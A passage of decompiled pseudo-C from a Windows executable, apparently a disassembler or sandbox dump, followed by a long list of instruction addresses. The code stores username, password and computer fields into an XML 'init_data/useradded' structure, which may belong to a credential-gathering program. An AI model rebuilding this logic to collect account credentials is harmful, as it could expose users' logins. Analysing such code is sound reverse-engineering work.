										_t657 =  *(_t1004 + 4);
										_t996 =  *((intOrPtr*)(_t1018 + 0x14));
										__eflags =  *(_t657 + _t996 + 4);
										if( *(_t657 + _t996 + 4) == 0) {
											_t658 = 0x432444;
											L104:
											 *(_t1018 + 0x24) = _t1018;
											E00408FB0(_t658, _t898);
											_push(L"username");
											 *((char*)(_t1018 + 0x88c)) = 0x20;
											_t997 =  *(E00408FB0());
											__eflags = _t997;
											 *((char*)(_t1018 + 0x888)) = 0x21;
											if(_t997 == 0) {
												_t998 = 0;
												__eflags = 0;
											} else {
												__eflags =  *(_t997 + 4);
												if( *(_t997 + 4) == 0) {
													 *(_t997 + 4) = E00419DD0( *_t997);
												}
												_t998 =  *(_t997 + 4);
											}
											_push(_t998);
											_push(_t1018 + 0x24);
											 *((char*)(_t1018 + 0x890)) = 0x22;
											_t902 =  *(_t1004 + 0x4c);
											E00413330( *(_t1004 + 0x4c), _t962);
											_t662 =  *(_t1018 + 0x2c);
											__eflags = _t662;
											 *((char*)(_t1018 + 0x884)) = 0x1c;
											if(_t662 != 0) {
												_t1001 = _t662;
												_t706 = InterlockedDecrement(_t662 + 8);
												__eflags = _t706;
												if(_t706 == 0) {
													__eflags = _t1001;
													if(_t1001 != 0) {
														_t707 =  *_t1001;
														__eflags = _t707;
														if(_t707 != 0) {
															__imp__#6(_t707);
														}
														_t708 =  *(_t1001 + 4);
														__eflags = _t708;
														if(__eflags != 0) {
															_push(_t708);
															L0041B408(_t807, _t1001, _t1004, __eflags);
															_t1018 = _t1018 + 4;
														}
														_push(_t1001);
														L0041A97D(_t807, _t1001, _t1004, __eflags);
														_t1018 = _t1018 + 4;
													}
												}
												 *(_t1018 + 0x2c) = 0;
											}
											_t663 =  *(_t1004 + 4);
											__eflags = _t663;
											if(_t663 == 0) {
												L120:
												E0041AD33();
												goto L121;
											} else {
												_t902 =  *((intOrPtr*)(_t1004 + 8)) - _t663;
												_t970 = 0x2aaaaaab * ( *((intOrPtr*)(_t1004 + 8)) - _t663) >> 0x20 >> 1;
												__eflags = _t807 - (_t970 >> 0x1f) + _t970;
												if(_t807 < (_t970 >> 0x1f) + _t970) {
													L121:
													_t665 =  *(_t1004 + 4);
													_t963 =  *((intOrPtr*)(_t1018 + 0x14));
													__eflags =  *(_t665 + _t963 + 8);
													if( *(_t665 + _t963 + 8) == 0) {
														 *(_t1018 + 0x24) = _t1018;
														E00408FB0(0x432444, _t902);
														_push(L"password");
														 *((char*)(_t1018 + 0x88c)) = 0x26;
														_t999 =  *(E00408FB0());
														__eflags = _t999;
														 *((char*)(_t1018 + 0x888)) = 0x27;
														if(_t999 == 0) {
															_t982 = 0;
															__eflags = 0;
														} else {
															__eflags =  *(_t999 + 4);
															if( *(_t999 + 4) == 0) {
																_t963 =  *_t999;
																 *(_t999 + 4) = E00419DD0( *_t999);
															}
															_t982 =  *(_t999 + 4);
														}
														_push(_t982);
														 *((char*)(_t1018 + 0x88c)) = 0x28;
														_push(_t1018 + 0x24);
														E00413330( *(_t1004 + 0x4c), _t963);
														_t670 =  *(_t1018 + 0x18);
														__eflags = _t670;
														 *((char*)(_t1018 + 0x884)) = 0x1c;
														if(_t670 != 0) {
															_t982 = _t670;
															_t673 = InterlockedDecrement(_t670 + 8);
															__eflags = _t673;
															if(_t673 == 0) {
																__eflags = _t982;
																if(_t982 != 0) {
																	_t674 =  *_t982;
																	__eflags = _t674;
																	if(_t674 != 0) {
																		__imp__#6(_t674);
																	}
																	_t675 =  *(_t982 + 4);
																	__eflags = _t675;
																	if(__eflags != 0) {
																		_push(_t675);
																		L0041B408(_t807, _t982, _t1004, __eflags);
																		_t1018 = _t1018 + 4;
																	}
																	_push(_t982);
																	L0041A97D(_t807, _t982, _t1004, __eflags);
																	_t1018 = _t1018 + 4;
																}
															}
															 *(_t1018 + 0x18) = 0;
														}
														goto L153;
													}
													__eflags = _t665;
													if(_t665 == 0) {
														L124:
														E0041AD33();
														L125:
														E00418B90( *((intOrPtr*)( *(_t1018 + 0x18) +  *(_t1004 + 4) + 8)), _t1018 + 0x80, 0x400, _t1018 + 0x3c);
														_t1018 = _t1018 + 0xc;
														_t966 = _t1018 + 0x7c;
														 *(_t1018 + 0x24) = _t1018;
														E00408F20(_t1018 + 0x7c);
														 *((char*)(_t1018 + 0x88c)) = 0x23;
														_t1000 =  *(E00408FB0(L"password", _t1018 + 0x7c));
														__eflags = _t1000;
														 *((char*)(_t1018 + 0x888)) = 0x24;
														if(_t1000 == 0) {
															_t982 = 0;
															__eflags = 0;
														} else {
															__eflags =  *(_t1000 + 4);
															if( *(_t1000 + 4) == 0) {
																 *(_t1000 + 4) = E00419DD0( *_t1000);
															}
															_t982 =  *(_t1000 + 4);
														}
														_push(_t982);
														_push(_t1018 + 0x24);
														 *((char*)(_t1018 + 0x890)) = 0x25;
														E00413330( *(_t1004 + 0x4c), _t966);
														_t686 =  *(_t1018 + 0x28);
														__eflags = _t686;
														 *((char*)(_t1018 + 0x884)) = 0x1c;
														if(_t686 != 0) {
															_t982 = _t686;
															_t688 = InterlockedDecrement(_t686 + 8);
															__eflags = _t688;
															if(_t688 == 0) {
																__eflags = _t982;
																if(_t982 != 0) {
																	_t689 =  *_t982;
																	__eflags = _t689;
																	if(_t689 != 0) {
																		__imp__#6(_t689);
																	}
																	_t690 =  *(_t982 + 4);
																	__eflags = _t690;
																	if(__eflags != 0) {
																		_push(_t690);
																		L0041B408(_t807, _t982, _t1004, __eflags);
																		_t1018 = _t1018 + 4;
																	}
																	_push(_t982);
																	L0041A97D(_t807, _t982, _t1004, __eflags);
																	_t1018 = _t1018 + 4;
																}
															}
															 *(_t1018 + 0x28) = 0;
														}
														goto L153;
													}
													_t968 = 0x2aaaaaab * ( *((intOrPtr*)(_t1004 + 8)) - _t665) >> 0x20 >> 1;
													__eflags = _t807 - (_t968 >> 0x1f) + _t968;
													if(_t807 < (_t968 >> 0x1f) + _t968) {
														goto L125;
													}
													goto L124;
												}
												goto L120;
											}
										}
										__eflags = _t657;
										if(_t657 == 0) {
											L101:
											E0041AD33();
											L102:
											_t962 =  *(_t1004 + 4);
											_t658 =  *((intOrPtr*)(_t996 +  *(_t1004 + 4) + 4));
											goto L104;
										}
										_t898 =  *((intOrPtr*)(_t1004 + 8)) - _t657;
										_t972 = 0x2aaaaaab * ( *((intOrPtr*)(_t1004 + 8)) - _t657) >> 0x20 >> 1;
										__eflags = _t807 - (_t972 >> 0x1f) + _t972;
										if(_t807 < (_t972 >> 0x1f) + _t972) {
											goto L102;
										}
										goto L101;
									}
									goto L97;
								}
							}
							goto L80;
						}
						L153:
						 *((intOrPtr*)(_t1018 + 0x14)) =  *((intOrPtr*)(_t1018 + 0x14)) + 0xc;
						_t836 = _t1004;
						_t807 = _t807 + 1;
						_t671 = E00403D00(_t836);
						__eflags = _t807 - _t671;
					} while (_t807 < _t671);
					goto L154;
				}
				do {
					 *((intOrPtr*)(_t1017 + 0x1c)) = _t1017;
					E00408FB0(0x432444, _t832);
					 *((intOrPtr*)(_t1017 + 0x30)) = _t1017;
					 *((char*)(_t1017 + 0x890)) = 0x14;
					E00408FB0(L"computer", _t1017);
					_push(L"//init_data//useradded");
					 *((char*)(_t1017 + 0x890)) = 0x15;
					_t757 = E00408FB0();
					 *((char*)(_t1017 + 0x88c)) = 0x16;
					 *((char*)(_t1017 + 0x88c)) = 0x17;
					_push(_t757);
					E00413190();
					_t759 =  *(_t1017 + 0x14);
					__eflags = _t759;
					 *((char*)(_t1017 + 0x884)) = 3;
					if(_t759 != 0) {
						_t982 = _t759;
						_t762 = InterlockedDecrement(_t759 + 8);
						__eflags = _t762;
						if(_t762 == 0) {
							__eflags = _t982;
							if(_t982 != 0) {
								_t763 =  *_t982;
								__eflags = _t763;
								if(_t763 != 0) {
									__imp__#6(_t763);
								}
								_t764 =  *(_t982 + 4);
								__eflags = _t764;
								if(__eflags != 0) {
									_push(_t764);
									L0041B408(0x17, _t982, _t1004, __eflags);
									_t1017 = _t1017 + 4;
								}
								_push(_t982);
								L0041A97D(0x17, _t982, _t1004, __eflags);
								_t1017 = _t1017 + 4;
							}
						}
						 *(_t1017 + 0x14) = 0;
					}
					_t832 = _t1004;
					_t1009 = _t1009 + 1;
					_t760 = E00403D00(_t1004);
					__eflags = _t1009 - _t760;
				} while (_t1009 < _t760);
				goto L61;
				L2:
				_t814 =  *_t443;
				_t443 = _t443 + 2;
				if(_t814 != 0) {
					goto L2;
				} else {
					E00401D80(_t803, _t1015 + 0x64, _t982, _t443 - _t934 >> 1);
					 *((intOrPtr*)(_t1015 + 0x890)) = 0;
					_t447 = E004092C0(_t1015 + 0x68, L"/\\", 0xffffffff, 2);
					_t817 = _t1015 + 0x68;
					E00404730(_t1015 + 0x48, 0, _t447);
					_t450 =  *((intOrPtr*)(_t1015 + 0x44));
					 *((char*)(_t1015 + 0x884)) = 1;
					if( *((intOrPtr*)(_t1015 + 0x58)) < 8) {
						_t450 = _t1015 + 0x44;
					}
					_t451 = E0041B849(_t450);
					_t1016 = _t1015 + 4;
					_t1024 = _t451;
					if(_t451 < 0) {
						E0041B805(_t1024);
					}
					_push(8);
					_t452 = E0041AD5C(_t803, _t934, _t982, _t1004, _t1024);
					_t1017 = _t1016 + 4;
					 *(_t1017 + 0x18) = _t452;
					 *((char*)(_t1017 + 0x884)) = 2;
					if(_t452 == 0) {
						_t453 = 0;
						__eflags = 0;
					} else {
						_t817 = _t452;
						_t453 = E00412AB0(_t452);
					}
					 *((intOrPtr*)(_t1017 + 0x1c)) = _t1017;
					 *((char*)(_t1017 + 0x88c)) = 1;
					 *(_t1004 + 0x4c) = _t453;
					E00408FB0(L"init_data", _t817);
					_t819 =  *(_t1004 + 0x4c);
					if(E00413020( *(_t1004 + 0x4c)) != 0) {
						 *0x43bab8(0, L"Cant do CreateXMLFile", L":)", 0);
					}
					 *((intOrPtr*)(_t1017 + 0x1c)) = 0;
					 *((intOrPtr*)(_t1017 + 0x2c)) = _t1017;
					 *((char*)(_t1017 + 0x88c)) = 3;
					E00408FB0(0x432444, _t819);
					 *((intOrPtr*)(_t1017 + 0x34)) = _t1017;
					 *((char*)(_t1017 + 0x890)) = 4;
					E00408FB0(L"autodetected", _t1017);
					_push(L"//init_data");
					 *((char*)(_t1017 + 0x890)) = 5;
					_t458 = E00408FB0();
					 *((char*)(_t1017 + 0x88c)) = 6;
					 *((char*)(_t1017 + 0x88c)) = 7;
					_t823 =  *(_t1004 + 0x4c);
					_push(_t458);
					E00413190();
					_t460 =  *(_t1017 + 0x18);
					_t804 = InterlockedDecrement;
					 *((char*)(_t1017 + 0x884)) = 3;
					if(_t460 != 0) {
						_t982 = _t460;
						if(InterlockedDecrement(_t460 + 8) == 0 && _t982 != 0) {
							_t797 =  *_t982;
							if(_t797 != 0) {
								__imp__#6(_t797);
							}
							_t798 =  *(_t982 + 4);
							_t1031 = _t798;
							if(_t798 != 0) {
								_push(_t798);
								L0041B408(_t804, _t982, _t1004, _t1031);
								_t1017 = _t1017 + 4;
							}
							_push(_t982);
							L0041A97D(_t804, _t982, _t1004, _t1031);
							_t1017 = _t1017 + 4;
						}
					}
					goto L20;
				}
			}










































































































































































                                                                                                                              0x00401060
                                                                                                                              0x00409b10
                                                                                                                              0x00409b12
                                                                                                                              0x00409b1d
                                                                                                                              0x00409b1e
                                                                                                                              0x00409b24
                                                                                                                              0x00409b2b
                                                                                                                              0x00409b32
                                                                                                                              0x00409b36
                                                                                                                              0x00409b3d
                                                                                                                              0x00409b45
                                                                                                                              0x00409b4b
                                                                                                                              0x00409b54
                                                                                                                              0x00409b56
                                                                                                                              0x00409b58
                                                                                                                              0x00409b5c
                                                                                                                              0x00409b64
                                                                                                                              0x00409b68
                                                                                                                              0x00409b6d
                                                                                                                              0x00409b6d
                                                                                                                              0x00409cec
                                                                                                                              0x00409cef
                                                                                                                              0x00409cf8
                                                                                                                              0x00409d00
                                                                                                                              0x00409d09
                                                                                                                              0x00409d11
                                                                                                                              0x00409d16
                                                                                                                              0x00409d1f
                                                                                                                              0x00409d27
                                                                                                                              0x00409d2c
                                                                                                                              0x00409d34
                                                                                                                              0x00409d3c
                                                                                                                              0x00409d3f
                                                                                                                              0x00409d40
                                                                                                                              0x00409d45
                                                                                                                              0x00409d4b
                                                                                                                              0x00409d53
                                                                                                                              0x00409d55
                                                                                                                              0x00409d5f
                                                                                                                              0x00409d72
                                                                                                                              0x00409d75
                                                                                                                              0x00409d77
                                                                                                                              0x00409d79
                                                                                                                              0x00409d7a
                                                                                                                              0x00409d7f
                                                                                                                              0x00409d7f
                                                                                                                              0x00409d82
                                                                                                                              0x00409d83
                                                                                                                              0x00409d88
                                                                                                                              0x00409d88
                                                                                                                              0x00409d5f
                                                                                                                              0x00409d8e
                                                                                                                              0x00409d97
                                                                                                                              0x00409d9f
                                                                                                                              0x00409da8
                                                                                                                              0x00409db0
                                                                                                                              0x00409db5
                                                                                                                              0x00409dbe
                                                                                                                              0x00409dc6
                                                                                                                              0x00409dcb
                                                                                                                              0x00409dd3
                                                                                                                              0x00409dde
                                                                                                                              0x00409ddf
                                                                                                                              0x00409de4
                                                                                                                              0x00409dea
                                                                                                                              0x00409df2
                                                                                                                              0x00409df4
                                                                                                                              0x00409dfe
                                                                                                                              0x00409e04
                                                                                                                              0x00409e08
                                                                                                                              0x00409e0b
                                                                                                                              0x00409e0b
                                                                                                                              0x00409e11
                                                                                                                              0x00409e14
                                                                                                                              0x00409e16
                                                                                                                              0x00409e18
                                                                                                                              0x00409e19
                                                                                                                              0x00409e1e
                                                                                                                              0x00409e1e
                                                                                                                              0x00409e21
                                                                                                                              0x00409e22
                                                                                                                              0x00409e27
                                                                                                                              0x00409e27
                                                                                                                              0x00409dfe
                                                                                                                              0x00409e2a
                                                                                                                              0x00409e30
                                                                                                                              0x00409e30
                                                                                                                              0x00409e35
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00409e3e
                                                                                                                              0x00409e52
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00409e5b
                                                                                                                              0x00409e64
                                                                                                                              0x00409e6c
                                                                                                                              0x00409e75
                                                                                                                              0x00409e7d
                                                                                                                              0x00409e82
                                                                                                                              0x00409e8b
                                                                                                                              0x00409e93
                                                                                                                              0x00409e98
                                                                                                                              0x00409ea0
                                                                                                                              0x00409eab
                                                                                                                              0x00409eac
                                                                                                                              0x00409eb1
                                                                                                                              0x00409eb7
                                                                                                                              0x00409ebf
                                                                                                                              0x00409ec1
                                                                                                                              0x00409ecf
                                                                                                                              0x00409ed5
                                                                                                                              0x00409ed9
                                                                                                                              0x00409edc
                                                                                                                              0x00409edc
                                                                                                                              0x00409ee2
                                                                                                                              0x00409ee5
                                                                                                                              0x00409ee7
                                                                                                                              0x00409ee9
                                                                                                                              0x00409eea
                                                                                                                              0x00409eef
                                                                                                                              0x00409eef
                                                                                                                              0x00409ef2
                                                                                                                              0x00409ef3
                                                                                                                              0x00409ef8
                                                                                                                              0x00409ef8
                                                                                                                              0x00409efb
                                                                                                                              0x00409efb
                                                                                                                              0x00409eff
                                                                                                                              0x00409eff
                                                                                                                              0x00409f07
                                                                                                                              0x00409f09
                                                                                                                              0x00409f0b
                                                                                                                              0x00409f10
                                                                                                                              0x00409f12
                                                                                                                              0x00409fd6
                                                                                                                              0x00409fd6
                                                                                                                              0x00409fe0
                                                                                                                              0x00409fe0
                                                                                                                              0x00409fe3
                                                                                                                              0x00409fe5
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00409fee
                                                                                                                              0x00409ff9
                                                                                                                              0x0040a003
                                                                                                                              0x0040a005
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040a00e
                                                                                                                              0x0040a017
                                                                                                                              0x0040a01f
                                                                                                                              0x0040a028
                                                                                                                              0x0040a030
                                                                                                                              0x0040a035
                                                                                                                              0x0040a03e
                                                                                                                              0x0040a046
                                                                                                                              0x0040a04b
                                                                                                                              0x0040a053
                                                                                                                              0x0040a05e
                                                                                                                              0x0040a05f
                                                                                                                              0x0040a064
                                                                                                                              0x0040a068
                                                                                                                              0x0040a06a
                                                                                                                              0x0040a072
                                                                                                                              0x0040a074
                                                                                                                              0x0040a07a
                                                                                                                              0x0040a080
                                                                                                                              0x0040a082
                                                                                                                              0x0040a084
                                                                                                                              0x0040a086
                                                                                                                              0x0040a088
                                                                                                                              0x0040a08a
                                                                                                                              0x0040a08c
                                                                                                                              0x0040a08f
                                                                                                                              0x0040a08f
                                                                                                                              0x0040a095
                                                                                                                              0x0040a098
                                                                                                                              0x0040a09a
                                                                                                                              0x0040a09c
                                                                                                                              0x0040a09d
                                                                                                                              0x0040a0a2
                                                                                                                              0x0040a0a2
                                                                                                                              0x0040a0a5
                                                                                                                              0x0040a0a6
                                                                                                                              0x0040a0ab
                                                                                                                              0x0040a0ab
                                                                                                                              0x0040a086
                                                                                                                              0x0040a0ae
                                                                                                                              0x0040a0ae
                                                                                                                              0x0040a0b6
                                                                                                                              0x0040a0b6
                                                                                                                              0x0040a0be
                                                                                                                              0x0040a0ce
                                                                                                                              0x0040a0d7
                                                                                                                              0x0040a0df
                                                                                                                              0x0040a0e7
                                                                                                                              0x0040a0f1
                                                                                                                              0x0040a103
                                                                                                                              0x0040a107
                                                                                                                              0x0040a10f
                                                                                                                              0x0040a114
                                                                                                                              0x0040a117
                                                                                                                              0x0040a119
                                                                                                                              0x0040a121
                                                                                                                              0x0040a123
                                                                                                                              0x0040a128
                                                                                                                              0x0040a12a
                                                                                                                              0x0040a55a
                                                                                                                              0x0040a55e
                                                                                                                              0x0040a562
                                                                                                                              0x0040a56b
                                                                                                                              0x0040a573
                                                                                                                              0x0040a57f
                                                                                                                              0x0040a588
                                                                                                                              0x0040a590
                                                                                                                              0x0040a595
                                                                                                                              0x0040a598
                                                                                                                              0x0040a598
                                                                                                                              0x0040a59a
                                                                                                                              0x0040a5a0
                                                                                                                              0x0040a5a0
                                                                                                                              0x0040a5a3
                                                                                                                              0x0040a5a5
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040a5ae
                                                                                                                              0x0040a5b7
                                                                                                                              0x0040a5c0
                                                                                                                              0x0040a5c2
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040a5cc
                                                                                                                              0x0040a5cd
                                                                                                                              0x0040a5ce
                                                                                                                              0x0040a5d5
                                                                                                                              0x0040a5d7
                                                                                                                              0x0040a5db
                                                                                                                              0x0040a5dd
                                                                                                                              0x0040a5e1
                                                                                                                              0x0040a5e9
                                                                                                                              0x0040a5e9
                                                                                                                              0x0040a5ee
                                                                                                                              0x0040a5f3
                                                                                                                              0x0040a5f7
                                                                                                                              0x0040a605
                                                                                                                              0x0040a607
                                                                                                                              0x0040a60a
                                                                                                                              0x0040a60c
                                                                                                                              0x0040a627
                                                                                                                              0x0040a627
                                                                                                                              0x00000000
                                                                                                                              0x0040a60e
                                                                                                                              0x0040a611
                                                                                                                              0x0040a61a
                                                                                                                              0x0040a623
                                                                                                                              0x0040a625
                                                                                                                              0x0040a62c
                                                                                                                              0x0040a634
                                                                                                                              0x0040a638
                                                                                                                              0x0040a63d
                                                                                                                              0x0040a642
                                                                                                                              0x0040a64b
                                                                                                                              0x0040a658
                                                                                                                              0x0040a65a
                                                                                                                              0x0040a65c
                                                                                                                              0x0040a664
                                                                                                                              0x0040a67b
                                                                                                                              0x0040a67b
                                                                                                                              0x0040a666
                                                                                                                              0x0040a666
                                                                                                                              0x0040a669
                                                                                                                              0x0040a673
                                                                                                                              0x0040a673
                                                                                                                              0x0040a676
                                                                                                                              0x0040a676
                                                                                                                              0x0040a67d
                                                                                                                              0x0040a682
                                                                                                                              0x0040a683
                                                                                                                              0x0040a68b
                                                                                                                              0x0040a68e
                                                                                                                              0x0040a693
                                                                                                                              0x0040a697
                                                                                                                              0x0040a699
                                                                                                                              0x0040a6a1
                                                                                                                              0x0040a6a3
                                                                                                                              0x0040a6a9
                                                                                                                              0x0040a6af
                                                                                                                              0x0040a6b1
                                                                                                                              0x0040a6b3
                                                                                                                              0x0040a6b5
                                                                                                                              0x0040a6b7
                                                                                                                              0x0040a6b9
                                                                                                                              0x0040a6bb
                                                                                                                              0x0040a6be
                                                                                                                              0x0040a6be
                                                                                                                              0x0040a6c4
                                                                                                                              0x0040a6c7
                                                                                                                              0x0040a6c9
                                                                                                                              0x0040a6cb
                                                                                                                              0x0040a6cc
                                                                                                                              0x0040a6d1
                                                                                                                              0x0040a6d1
                                                                                                                              0x0040a6d4
                                                                                                                              0x0040a6d5
                                                                                                                              0x0040a6da
                                                                                                                              0x0040a6da
                                                                                                                              0x0040a6b5
                                                                                                                              0x0040a6dd
                                                                                                                              0x0040a6dd
                                                                                                                              0x0040a6e1
                                                                                                                              0x0040a6e4
                                                                                                                              0x0040a6e6
                                                                                                                              0x0040a701
                                                                                                                              0x0040a701
                                                                                                                              0x00000000
                                                                                                                              0x0040a6e8
                                                                                                                              0x0040a6eb
                                                                                                                              0x0040a6f4
                                                                                                                              0x0040a6fd
                                                                                                                              0x0040a6ff
                                                                                                                              0x0040a706
                                                                                                                              0x0040a706
                                                                                                                              0x0040a709
                                                                                                                              0x0040a70d
                                                                                                                              0x0040a711
                                                                                                                              0x0040a740
                                                                                                                              0x0040a745
                                                                                                                              0x0040a748
                                                                                                                              0x0040a74d
                                                                                                                              0x0040a752
                                                                                                                              0x0040a75b
                                                                                                                              0x0040a768
                                                                                                                              0x0040a76a
                                                                                                                              0x0040a76c
                                                                                                                              0x0040a774
                                                                                                                              0x0040a78b
                                                                                                                              0x0040a78b
                                                                                                                              0x0040a776
                                                                                                                              0x0040a776
                                                                                                                              0x0040a779
                                                                                                                              0x0040a783
                                                                                                                              0x0040a783
                                                                                                                              0x0040a786
                                                                                                                              0x0040a786
                                                                                                                              0x0040a78d
                                                                                                                              0x0040a78e
                                                                                                                              0x0040a792
                                                                                                                              0x0040a79d
                                                                                                                              0x0040a79e
                                                                                                                              0x0040a7a3
                                                                                                                              0x0040a7a7
                                                                                                                              0x0040a7a9
                                                                                                                              0x0040a7b1
                                                                                                                              0x0040a7b3
                                                                                                                              0x0040a7b9
                                                                                                                              0x0040a7bf
                                                                                                                              0x0040a7c1
                                                                                                                              0x0040a7c3
                                                                                                                              0x0040a7c5
                                                                                                                              0x0040a7c7
                                                                                                                              0x0040a7c9
                                                                                                                              0x0040a7cb
                                                                                                                              0x0040a7ce
                                                                                                                              0x0040a7ce
                                                                                                                              0x0040a7d4
                                                                                                                              0x0040a7d7
                                                                                                                              0x0040a7d9
                                                                                                                              0x0040a7db
                                                                                                                              0x0040a7dc
                                                                                                                              0x0040a7e1
                                                                                                                              0x0040a7e1
                                                                                                                              0x0040a7e4
                                                                                                                              0x0040a7e5
                                                                                                                              0x0040a7ea
                                                                                                                              0x0040a7ea
                                                                                                                              0x0040a7c5
                                                                                                                              0x0040a7ed
                                                                                                                              0x0040a7ed
                                                                                                                              0x0040a7f1
                                                                                                                              0x0040a7f4
                                                                                                                              0x0040a7f6
                                                                                                                              0x0040a811
                                                                                                                              0x0040a811
                                                                                                                              0x00000000
                                                                                                                              0x0040a7f8
                                                                                                                              0x0040a804
                                                                                                                              0x0040a80d
                                                                                                                              0x0040a80f
                                                                                                                              0x0040a816
                                                                                                                              0x0040a816
                                                                                                                              0x0040a819
                                                                                                                              0x0040a81d
                                                                                                                              0x0040a821
                                                                                                                              0x0040a935
                                                                                                                              0x0040a93e
                                                                                                                              0x0040a943
                                                                                                                              0x0040a94c
                                                                                                                              0x0040a959
                                                                                                                              0x0040a95b
                                                                                                                              0x0040a95d
                                                                                                                              0x0040a965
                                                                                                                              0x0040a97c
                                                                                                                              0x0040a97c
                                                                                                                              0x0040a967
                                                                                                                              0x0040a967
                                                                                                                              0x0040a96a
                                                                                                                              0x0040a96c
                                                                                                                              0x0040a974
                                                                                                                              0x0040a974
                                                                                                                              0x0040a977
                                                                                                                              0x0040a977
                                                                                                                              0x0040a97e
                                                                                                                              0x0040a983
                                                                                                                              0x0040a98e
                                                                                                                              0x0040a98f
                                                                                                                              0x0040a994
                                                                                                                              0x0040a998
                                                                                                                              0x0040a99a
                                                                                                                              0x0040a9a2
                                                                                                                              0x0040a9a4
                                                                                                                              0x0040a9aa
                                                                                                                              0x0040a9b0
                                                                                                                              0x0040a9b2
                                                                                                                              0x0040a9b4
                                                                                                                              0x0040a9b6
                                                                                                                              0x0040a9b8
                                                                                                                              0x0040a9ba
                                                                                                                              0x0040a9bc
                                                                                                                              0x0040a9bf
                                                                                                                              0x0040a9bf
                                                                                                                              0x0040a9c5
                                                                                                                              0x0040a9c8
                                                                                                                              0x0040a9ca
                                                                                                                              0x0040a9cc
                                                                                                                              0x0040a9cd
                                                                                                                              0x0040a9d2
                                                                                                                              0x0040a9d2
                                                                                                                              0x0040a9d5
                                                                                                                              0x0040a9d6
                                                                                                                              0x0040a9db
                                                                                                                              0x0040a9db
                                                                                                                              0x0040a9b6
                                                                                                                              0x0040a9de
                                                                                                                              0x0040a9de
                                                                                                                              0x0040a9e2
                                                                                                                              0x0040a9e2
                                                                                                                              0x0040a9e5
                                                                                                                              0x00000000
                                                                                                                              0x0040a9e5
                                                                                                                              0x0040a827
                                                                                                                              0x0040a829
                                                                                                                              0x0040a844
                                                                                                                              0x0040a844
                                                                                                                              0x0040a849
                                                                                                                              0x0040a867
                                                                                                                              0x0040a86c
                                                                                                                              0x0040a86f
                                                                                                                              0x0040a878
                                                                                                                              0x0040a87d
                                                                                                                              0x0040a88b
                                                                                                                              0x0040a898
                                                                                                                              0x0040a89a
                                                                                                                              0x0040a89c
                                                                                                                              0x0040a8a4
                                                                                                                              0x0040a8bb
                                                                                                                              0x0040a8bb
                                                                                                                              0x0040a8a6
                                                                                                                              0x0040a8a6
                                                                                                                              0x0040a8a9
                                                                                                                              0x0040a8b3
                                                                                                                              0x0040a8b3
                                                                                                                              0x0040a8b6
                                                                                                                              0x0040a8b6
                                                                                                                              0x0040a8bd
                                                                                                                              0x0040a8c2
                                                                                                                              0x0040a8c3
                                                                                                                              0x0040a8ce
                                                                                                                              0x0040a8d3
                                                                                                                              0x0040a8d7
                                                                                                                              0x0040a8d9
                                                                                                                              0x0040a8e1
                                                                                                                              0x00000000
                                                                                                                              0x0040a8e7
                                                                                                                              0x0040a8e7
                                                                                                                              0x0040a8ed
                                                                                                                              0x0040a8f3
                                                                                                                              0x0040a8f5
                                                                                                                              0x0040a8f7
                                                                                                                              0x0040a8f9
                                                                                                                              0x0040a8fb
                                                                                                                              0x0040a8fd
                                                                                                                              0x0040a8ff
                                                                                                                              0x0040a902
                                                                                                                              0x0040a902
                                                                                                                              0x0040a908
                                                                                                                              0x0040a90b
                                                                                                                              0x0040a90d
                                                                                                                              0x0040a90f
                                                                                                                              0x0040a910
                                                                                                                              0x0040a915
                                                                                                                              0x0040a915
                                                                                                                              0x0040a918
                                                                                                                              0x0040a919
                                                                                                                              0x0040a91e
                                                                                                                              0x0040a91e
                                                                                                                              0x0040a8f9
                                                                                                                              0x0040a921
                                                                                                                              0x0040a924
                                                                                                                              0x0040a929
                                                                                                                              0x00000000
                                                                                                                              0x0040a929
                                                                                                                              0x0040a8e1
                                                                                                                              0x0040a837
                                                                                                                              0x0040a840
                                                                                                                              0x0040a842
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040a842
                                                                                                                              0x00000000
                                                                                                                              0x0040a80f
                                                                                                                              0x0040a7f6
                                                                                                                              0x0040a713
                                                                                                                              0x0040a715
                                                                                                                              0x0040a717
                                                                                                                              0x0040a732
                                                                                                                              0x0040a732
                                                                                                                              0x0040a737
                                                                                                                              0x0040a73a
                                                                                                                              0x00000000
                                                                                                                              0x0040a73a
                                                                                                                              0x0040a71c
                                                                                                                              0x0040a725
                                                                                                                              0x0040a72e
                                                                                                                              0x0040a730
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040a730
                                                                                                                              0x00000000
                                                                                                                              0x0040a6ff
                                                                                                                              0x0040a6e6
                                                                                                                              0x00000000
                                                                                                                              0x0040a625
                                                                                                                              0x0040a60c
                                                                                                                              0x0040a9f3
                                                                                                                              0x0040a9f7
                                                                                                                              0x0040aa00
                                                                                                                              0x0040aa08
                                                                                                                              0x0040aa0f
                                                                                                                              0x0040aa0f
                                                                                                                              0x0040aa11
                                                                                                                              0x0040aa15
                                                                                                                              0x0040aa15
                                                                                                                              0x0040aa18
                                                                                                                              0x0040aa1a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040aa23
                                                                                                                              0x0040aa2e
                                                                                                                              0x0040aa38
                                                                                                                              0x0040aa3a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040aa44
                                                                                                                              0x0040aa45
                                                                                                                              0x0040aa46
                                                                                                                              0x0040aa4d
                                                                                                                              0x0040aa4f
                                                                                                                              0x0040aa53
                                                                                                                              0x0040aa55
                                                                                                                              0x0040aa59
                                                                                                                              0x0040aa61
                                                                                                                              0x0040aa61
                                                                                                                              0x0040aa66
                                                                                                                              0x0040aa6b
                                                                                                                              0x0040aa6f
                                                                                                                              0x0040aa7d
                                                                                                                              0x0040aa7f
                                                                                                                              0x0040aa82
                                                                                                                              0x0040aa84
                                                                                                                              0x0040aaa2
                                                                                                                              0x0040aaa2
                                                                                                                              0x00000000
                                                                                                                              0x0040aa86
                                                                                                                              0x0040aa89
                                                                                                                              0x0040aa94
                                                                                                                              0x0040aa9e
                                                                                                                              0x0040aaa0
                                                                                                                              0x0040aaa7
